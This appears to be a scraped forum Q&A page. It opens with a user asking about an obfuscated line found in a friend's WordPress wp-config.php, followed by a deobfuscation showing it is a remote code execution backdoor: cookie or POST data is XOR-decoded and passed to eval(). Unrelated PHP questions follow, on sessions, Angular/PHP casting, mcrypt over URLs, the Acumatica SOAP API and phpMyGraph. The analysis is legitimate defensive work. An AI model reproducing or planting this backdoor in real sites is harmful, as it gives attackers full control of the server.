my friend's wordpress wp-config.php was added with one line of code:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);#$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=#$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>#$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo#$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
What does it means?
I've tried to change eval to print, but nothing shown.
https://eval.in/584427
By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^#G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container.
The part between this array and the first function declaration boils down to this:
#ini_set('error_log', NULL); // #$ge142efa['xa2a5ede']('error_log', NULL);
#ini_set('log_errors', 0); // #$ge142efa['xa2a5ede']('log_errors', 0);
#ini_set('max_execution_time', 0); // #$ge142efa['xa2a5ede']('max_execution_time', 0);
#set_time_limit(0); // #$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
The first function reads thus:
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
It appears to xor two strings and return the result.
The function below that, i461, uses it twice:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
The code below these two functions
can be beautified to this:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =# "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => #"phpversion"(), "sv" => "1.0-1",);
echo#"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
The critical part here is the eval. From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST. Basically a portion of code waiting to get the right request and execute the code specified by it.
I'm Just dealing with same issue. Your friend's have to make some changes. May be IP Address is traced by some person & he is doing some changes in database and it's affecting your front end and code also.
- If you have backup of database then change the database.
- Install some security Plugin like All In One WP Security & Firewall.
(Because if IP is traced again than it may help in future).
Some other changes.
Search Images path in database may be it contains malware.
Remove unused script from code.
Change Admin panel login credential.
Change Cpanel credential.
Related
I have a huge problem which I can't seem to fix. I got 2 files. insertDB.php(for writing content into my database) & mail.php(for sending me a mail if something got written into databse). Because I don't want the mail stuff in the same file as the SQL-Statements, I created the mail.php file.
Now I want to pass Variables or an Array from insertDB to mail. It works in every other file I'm using but it's not working here.
<?php
//insertDB.php
Session_Start();
include 'dbconnect.php';
$login = $_SESSION['login'];
$num = $_mysqli->real_escape_string($_POST['num']);
$date = $_mysqli->real_escape_string($_POST['date']);
$user = $_mysqli->real_escape_string($_POST['user']);
$program = $_mysqli->real_escape_string($_POST['program']);
$name = $_mysqli->real_escape_string($_POST['name']);
$path = $_mysqli->real_escape_string($_POST['path']);
$mailData = [$num, $date, $user, $program, $name, $path];
$_SESSION['mailData'] = $mailData;
// var_dump($_SESSION['mailData']); <- outputs array WITH content
$insert = "INSERT INTO Zeichnungen (Num, Date, User, Program, Name, Path, Info, Leer)
VALUES ('$num', '$date', '$user', '$program', '$name', '$path', '', '$login')";
if ($_result = $_mysqli->query($insert)) {
header('Location: mail.php');
}
?>
<?php
//mail.php
Session_Start();
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
use PHPMailer\PHPMailer\SMTP;
include '/opt/composer/vendor/autoload.php';
include 'insertDB.php';
$login = $_SESSION['login'];
var_dump($_SESSION['mailData']);
?>
/* Output I see in Browser from mail.php -> var_dump($_SESSION['mailData']); : */
array(6) { [0]=> string(0) "" [1]=> string(0) "" [2]=> string(0) "" [3]=> string(0) "" [4]=> string(0) "" [5]=> string(0) "" }
What is the problem? Why does it have no content but the 6 keys?
Any help appreciated.
Looking at the code, there is nothing obvious to me that can cause var_dump() to print 6 empty strings. Running the provided code does not reproduce your problem (despite unnecessarily calling start_session() again, but that has no effect other than a warning).
This is difficult to debug this way. Don't use the session for this if this data does not survive through multiple requests. If you don't want to use classes, at least pass the data to functions with one responsibility. Using the session to store these variables is not a good practice. It is unnecessary global state and will eventually make this code even more difficult to follow and debug.
You have several examples in http://php.net/manual/en/functions.user-defined.php. Define the functions in one file and note that you must include that file before being able to use them. Do not mix concerns, ie: your mail function should not set HTTP headers, and your database function should not access the $_SESSION or $_POST variables.
For example, in insertIntoDb.php (less fields for clarity) and using functions:
<?php
// ... (necessary mysqli includes, etc.)
function insertIntoDB(array $formData) {
// we escape the data here, this escaping is DB specific.
$num = $_mysqli->real_escape_string($formData['num']);
$date = $_mysqli->real_escape_string($formData['date']);
$login = $formData['login'];
$insert = "
INSERT INTO SomeTable (Num, Date, Login)
VALUES ('$num', '$date', '$login');
";
// it's better not to have other side effects here
// if everything goes right, we just continue
$result = $_mysqli->query($insert);
if (!$result) {
die("Database error");
}
}
In your mail.php file:
<?php
include 'insertIntoDb.php';
include 'sendEmail.php';
// we read the POST and other values here
// constructing an associative array is an
// option if not using objects.
$formData = [
'num' => $_POST['num'],
'date' => $_POST['date'],
'login' => $_SESSION['login'],
];
// using the functions
insertIntoDb($formData);
sendEmail($formData); // defined in sendEmail.php, not in example.
// this point is reached when everything works,
// no need to control flow...
header('Location: success.php'); // perhaps "thanks" message.
as many have said, the code is clean and should work. The other possible culprit is the following line
header('Location: mail.php');
The php function header() clears all GETs & POSTs when client leaves current page.
Instead make mail.php a function then include mail.php in insertDB.php
NB: try to adopt OOP coding particulary when dealing with PHP
For instance
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change from string to int
var_dump($user_post_int_id); // gives int(1) 0, I don't know why isn't type conversion working!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out the 0
So the main problem I think is of type conversion, as I tried one more thing where String(1) is converting to int(1) with no problem but with string(16) everything blows apart and results to 0.
i got 3 suggestion 4u (on my server all works fine)
as a original with my comments:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}"; //this syntax works
var_dump($user_post_id); // gives String(16) '1'
$user_post_int_id = (int)$user_post_id; // change to int
var_dump($user_post_int_id);
// gives int(1) 1, is not test your php/server conf!
echo $user_post_id; // echoes out 1
echo $user_post_int_id; //echoes out 1
then i advise you to try with your code, run on your server with changes:
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int){{list.user.id}};
//hopes your php wudn't show an error
replace $user_post_int_id = (int)$user_post_id;
to $user_post_int_id = floor((int)$user_post_id);
or $user_post_int_id = ceil((int)$user_post_id);
replace $user_post_id = "{{list.user.id}}";
to $user_post_id = (int)({{list.user.id}}) + 1 ;
or plus zero, these hack sometimes works for me !
p.s. (int) can do a trick with you, php can thout that you uses hex bin or smth else. retest it twice !
php.net/manual/en/language.types.integer.php
php.net/manual/en/language.types.type-juggling.php
You cannot use Angular expression inside a server side statements, as Angular statement runs on client side after running all server logic.
In your code:
<div ng-repeat = 'list in lists'>
<?php
$user_post_id = "{{list.user.id}}" //list.user.id is a JS variable, you cannot use it in PHP.
$user_post_int_id = (int)$user_post_id; // something wrong here, you do not need this step, normally if you retrieved the code from server side.
{{ $user_post_int_id }} //this should not work
But still this blade function fails
#if(Auth::user()->id == $user_post_int_id)
do something //returns false, makes alot of sense, as again you are trying to get variables from JS and passing them to PHP scripts. This will never work.
#endif
I have a weird problem regarding passing an encrypted string through url. I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
I have this piece of code to encrypt:
$link_string = http_build_query(array('index_number'=>30843854, 'extra_attendence_id'=>27982423, 'target_temporary_id'=>378492085, 'date'=>'2016-05-06', 'action'=>'OUT', 'target_id'=>390234), '', '&');
$link_string = encryptHTML($link_string);
then I passed it through this url:
'localhost/website/controller/action/'.$link_string
then I decrypted it with this piece of code:
$id = $this->request->param('id');
$id = decryptHTML($id);
parse_str($id, $arr_id2);
var_dump($arr_id2);
I will get these in return, as expected:
array(6) { ["index_number"]=> string(8) "30843854" ["extra_attendence_id"]=> string(8) "27982423" ["target_temporary_id"]=> string(9) "378492085" ["date"]=> string(10) "2016-05-06" ["action"]=> string(3) "OUT" ["target_id"]=> string(6) "390234" }
The next case is when I still want the encrypted link but I need to attach some other value from DOM element in the page, so I tried to
'localhost/website/controller/action/encrypt='.$link_string.'&DOMvalue=10000'
then I modified the decryption with this piece of code:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
$id = decryptHTML($arr_id2['crypted']);
parse_str($id, $arr_id);
var_dump($the_DOMValue); echo "<br>";
var_dump($arr_id);
But then, I get these in return, to my surprise:
string(5) "10000"
array(3) { ["index_number"]=> string(13) "58_2016-04-26" ["extra_attendence_id"]=> string(1) "0" ["target_t"]=> string(0) "" }
My original string was cut short! Note that the DOMvalue is fine.
Then, I checked that right before both decryption, if the given encrypted string is different:
on first case of decryptHTML:
$id = $this->request->param('id');
var_dump($id);
$id = decryptHTML($id);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz+zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj+GL5Ym-ET6JEHDShST4etgcQaEYXml-+BZ2+0BQKvubZEBOB"
on the second case of decryptHTML:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
var_dump($arr_id2['crypted']);
$id = decryptHTML($arr_id2['crypted']);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj GL5Ym-ET6JEHDShST4etgcQaEYXml- BZ2 0BQKvubZEBOB"
It looks exactly the same to me, but strangely it was decrypted differently. I of course used the same functions to decrypt both cases...
Anybody can shed me some light on this?
passing an encrypted string through url
Passing an encrypted string through a URL is a bad idea. Full stop.
I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
Without seeing what these functions do, this isn't helpful information, but mcrypt should be avoided. Use Libsodium (if you can; otherwise, use OpenSSL) instead.
My original string was cut short!
It probably treated the + as a space. Using urlencode() would fix one problem, but it wouldn't solve the vulnerability to chosen-ciphertext attacks that using mcrypt introduces into your application in the absence of a Message Authentication Code (MAC).
I'm trying to use the Acumatica Web Services API to get a list of Contacts (really I'm looking to get ANYTHING, but Contacts are what I'm playing with right now).
I'm successfully able to get a SoapClient connected, but not sure what exactly to do from there to pull a list of all Contacts.
Seeing how you didn't specify Acumatica version or Webservices I'm assuming you are trying to use the "Screen WebAPI" that was in 5.2 and earlier and not the new "Contract Based API" in 5.3
With that in mind, here is an example of how to make the connection and retrieve a list of all of the contacts.
The first step is to utilize the "acuwsdl2php" helper file to generate the needed screen helper classes for PHP.
In the case of contacts:
php acuwsdl2php.php {url of your site}/Soap/CR302000.asmx?WSDL CR302000
This will create the CR302000 subfolder with a Screen.php file that is the php equivalent of the schema for the screen.
Second, here is a sample class that retrieves contact information
<?php
require_once('AcumaticaGate.php');
$client = new AcumaticaGate('{user}', '{password}', 'CR302000','{site}/Soap/');
$Contact_summary = $client->Schema->GetSchemaResult->ContactSummary;
$Contact_detailsummary = $client->Schema->GetSchemaResult->DetailsSummary;
$every_Contact = $Contact_summary->ServiceCommands->EveryContactID;
$Contact = $Contact_summary->ContactID;
$Contact_fname = $Contact_detailsummary->FirstName;
$Contact_lname = $Contact_detailsummary->LastName;
$export_param = new Export();
$export_param->commands = array($every_Contact, $Contact, $Contact_fname, $Contact_lname);
$export_param->filters = array();
$export_param->breakOnError = false;
$export_param->includeHeaders = true;
$export_param->topCount = 0;
$export = $client->Client->Export($export_param);
print_r(var_dump($export));
The output here is something like this:
[177]=>
object(stdClass)#562 (1) {
["string"]=>
array(3) {
[0]=>
string(3) "358"
[1]=>
string(4) "Anna"
[2]=>
string(7) "Johnson"
}
}
[178]=>
object(stdClass)#563 (1) {
["string"]=>
array(3) {
[0]=>
string(3) "359"
[1]=>
string(4) "Yona"
[2]=>
string(5) "Jones"
}
}
The acuwsdl2php and AcumaticaGate files are helper files that Acumatica provided to partners. They might also be available on the client portal for download. A quick google for them though and I believe you can find them on a few public sites.
As a side note, these helper files were originally written for 4.x. You should look at the 5.x guides (assuming you have 5.x) for added information on logging off of a webapi when finished calling it.
I could not find any answer to my question.
I'm using PhPmyGraph ( http://phpmygraph.abisvmm.nl/ ) to display a graph of some data from my databases.
The problem is that I have to create my arrays in the file itself, and if I want 2 graphs on the page I need to create 2 different files.
Apparently the file is easier to use with a CMS but I'm not using one.
This is the file graph.php:
<?php
//Set content-type header for the graphs
header("Content-type: image/png");
//Include phpMyGraph5.0.php
include_once('../phpMyGraph5.0.php');
//Set config directives
$cfg['title'] = 'Example graph';
$cfg['width'] = 500;
$cfg['height'] = 250;
//Set data
$data = array(
'Jan' => 12,
'Nov' => 78,
'Dec' => 23
);
//Create phpMyGraph instance
$graph = new phpMyGraph();
//Parse
$graph->parseVerticalPolygonGraph($data, $cfg);
?>
I call it in my page index.php:
echo " < img src=\"graph.php\"> ";
Is there another way to do it? And send the data from index.php to graph.php?
Or maybe move the code graph.php into index.php ? The problem is for the image object, I don't really know how to do it!
UPDATE:
I have almost found a solution, my code is now:
in graph.php:
//Parse
$graph->parseVerticalPolygonGraph(unserialize($_GET['data']), $cfg);
index.php :
$select_daily = mysql_query("SELECT * FROM table");
while ($row_daily = mysql_fetch_assoc($select_daily) ){
$y = substr($row_daily['ymd'], 0, -4); // Year
$m = substr($row_daily['ymd'], 4, -2); // Month
$d = substr($row_daily['ymd'], -2); // Day
$key = $d."/".$m."/".$y;
$data_daily [$key] = $row_daily['members'];
}
foreach($data_daily as $key => $value) {
echo $key ,' : ', $value ,'<br/>';
}
echo "< img src=\"graph.php?data=".serialize($data_daily)."\">";
But I get the error "provided data is not an array"
I can't see what's wrong with it?
if I do var_dump($data_daily) I get:
array(8) { ["14/12/2011"]=> string(1) "0" ["13/12/2011"]=> string(2)
"11" ["12/12/2011"]=> string(1) "0" ["11/12/2011"]=> string(1) "2"
["10/12/2011"]=> string(1) "9" ["09/12/2011"]=> string(1) "3"
["08/12/2011"]=> string(1) "6" ["07/12/2011"]=> string(1) "6" }
UPDATE2:
var_dump($data1); gives:
array(12) { ["Jan"]=> int(12) ["Feb"]=>
int(25) ["Mar"]=> int(0) ["Apr"]=> int(7) ["May"]=> int(80) ["Jun"]=>
int(67) ["Jul"]=> int(45) ["Aug"]=> int(66) ["Sep"]=> int(23)
["Oct"]=> int(23) ["Nov"]=> int(78) ["Dec"]=> int(23) }
and var_dump($s_data1 = serialize($data1)) gives:
a:12:s:3:"Jan";i:12;s:3:"Feb";i:25;s:3:"Mar";i:0;s:3:"Apr";i:7;s:3:"May";i:80;s:3:"Jun";i:67;s:3:"Jul";i:45;s:3:"Aug";i:66;s:3:"Sep";i:23;s:3:"Oct";i:23;s:3:"Nov";i:78;s:3:"Dec";i:23;}
Then unserialize($s_data1); gives the same thing than $data1
So the argument 1 of the parse should be correct... I can’t see what is wrong
I finally gave up and loaded my arrays in graph.php:
if ($_GET['data'] == 'daily'){
$cfg['title'] = 'daily';
$graph->parseVerticalPolygonGraph($data_daily, $cfg);
}
And I call the file like that:
echo "<img src=\"graph.php?data=daily\">";
Thanks for your help anyway
I previously needed a page to display multiple graphs using phpMyGraph and the approach I took was to use data URI's and php's ob_start() and ob_get_clean()
Simply use this for each graph:
ob_start();
$graph->parseVerticalPolygonGraph($data, $cfg);
$img = ob_get_clean();
echo "<img src='data:image/gif;base64," . base64_encode($img) . "/>";
I recommend using gif's for the format since that way your page size will not be huge, you can do this by setting $cfg["type"] to "gif" (See here http://phpmygraph.abisvmm.nl/#ConfigDirectives)
